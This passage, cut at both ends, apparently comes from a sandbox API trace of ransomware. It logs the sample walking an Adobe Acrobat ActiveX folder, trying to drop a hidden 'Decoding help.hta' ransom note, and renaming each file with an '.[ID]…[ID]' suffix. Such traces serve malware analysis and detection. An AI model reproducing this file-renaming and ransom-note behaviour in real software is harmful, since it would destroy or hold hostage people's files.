Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0050.652] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="PDFShell.CHT" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CHT") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CHT" [0050.652] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CHT" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CHT") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CHT" [0050.652] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CHT", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CHT.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CHT.[ID]g9uZrLhJaygpwRm1[ID]" [0050.652] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CHT" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.cht"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CHT.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.cht.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0050.652] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81d5bd20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x49600, dwReserved0=0x0, dwReserved1=0x0, cFileName="PDFShell.CZE", cAlternateFileName="")) returned 1 [0050.652] lstrcpyW (in: lpString1=0x10bce4c8, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0050.653] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0050.653] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0050.653] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0050.653] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0050.653] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0050.653] CloseHandle (hObject=0xffffffff) returned 0 [0050.653] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0050.653] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PDFShell.CZE") returned -1 [0050.653] lstrlenW (lpString="PDFShell.CZE") returned 12 [0050.653] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0050.653] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0050.653] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="PDFShell.CZE" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CZE") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CZE" [0050.653] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CZE" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CZE") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CZE" [0050.653] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CZE", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CZE.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CZE.[ID]g9uZrLhJaygpwRm1[ID]" [0050.653] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CZE" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.cze"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CZE.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.cze.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0051.594] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8058e120, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x49600, dwReserved0=0x0, dwReserved1=0x0, cFileName="PDFShell.DAN", cAlternateFileName="")) returned 1 [0052.289] lstrcpyW (in: lpString1=0x114950c8, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0052.289] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0052.289] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0052.289] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0052.289] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0052.289] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0052.289] CloseHandle (hObject=0xffffffff) returned 0 [0052.289] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0052.289] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PDFShell.DAN") returned -1 [0052.289] lstrlenW (lpString="PDFShell.DAN") returned 12 [0052.289] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0052.289] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0052.289] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="PDFShell.DAN" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.DAN") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.DAN" [0052.289] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.DAN" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.DAN") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.DAN" [0052.289] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.DAN", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.DAN.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.DAN.[ID]g9uZrLhJaygpwRm1[ID]" [0052.290] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.DAN" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.dan"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.DAN.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.dan.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0052.290] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8058e120, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x49800, dwReserved0=0x0, dwReserved1=0x0, cFileName="PDFShell.DEU", cAlternateFileName="")) returned 1 [0052.290] lstrcpyW (in: lpString1=0x114950c8, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0052.290] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0052.290] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0052.290] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0052.290] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0052.290] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0052.290] CloseHandle (hObject=0xffffffff) returned 0 [0052.290] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0052.290] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PDFShell.DEU") returned -1 [0052.290] lstrlenW (lpString="PDFShell.DEU") returned 12 [0052.290] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0052.290] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0052.290] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="PDFShell.DEU" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.DEU") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.DEU" [0052.290] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.DEU" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.DEU") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.DEU" [0052.291] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.DEU", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.DEU.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.DEU.[ID]g9uZrLhJaygpwRm1[ID]" [0052.291] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.DEU" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.deu"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.DEU.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.deu.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0052.291] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8051bd00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x5f598, dwReserved0=0x0, dwReserved1=0x0, cFileName="pdfshell.dll", cAlternateFileName="")) returned 1 [0052.291] lstrcpyW (in: lpString1=0x114950c8, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0052.291] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0052.291] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0052.291] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0052.291] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0052.291] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0052.291] CloseHandle (hObject=0xffffffff) returned 0 [0052.291] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0052.291] lstrcmpiW (lpString1="Decoding help.hta", lpString2="pdfshell.dll") returned -1 [0052.291] lstrlenW (lpString="pdfshell.dll") returned 12 [0052.291] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0052.291] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0052.291] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="pdfshell.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\pdfshell.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\pdfshell.dll" [0052.291] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\pdfshell.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\pdfshell.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\pdfshell.dll" [0052.291] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\pdfshell.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\pdfshell.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\pdfshell.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0052.292] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\pdfshell.dll" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\pdfshell.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0052.292] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80567fc0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x49800, dwReserved0=0x0, dwReserved1=0x0, cFileName="PDFShell.ESP", cAlternateFileName="")) returned 1 [0052.292] lstrcpyW (in: lpString1=0x114950c8, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0052.292] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0052.292] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0052.292] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0052.292] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0052.292] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0052.292] CloseHandle (hObject=0xffffffff) returned 0 [0052.292] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0052.292] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PDFShell.ESP") returned -1 [0052.292] lstrlenW (lpString="PDFShell.ESP") returned 12 [0052.292] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0052.292] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0052.292] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="PDFShell.ESP" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.ESP") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.ESP" [0052.292] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.ESP" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.ESP") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.ESP" [0052.293] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.ESP", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.ESP.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.ESP.[ID]g9uZrLhJaygpwRm1[ID]" [0052.293] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.ESP" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.esp"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.ESP.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.esp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0052.488] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d67db00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81f24da0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9d67db00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x49600, dwReserved0=0x0, dwReserved1=0x0, cFileName="PDFShell.EUQ", cAlternateFileName="")) returned 1 [0052.488] lstrcpyW (in: 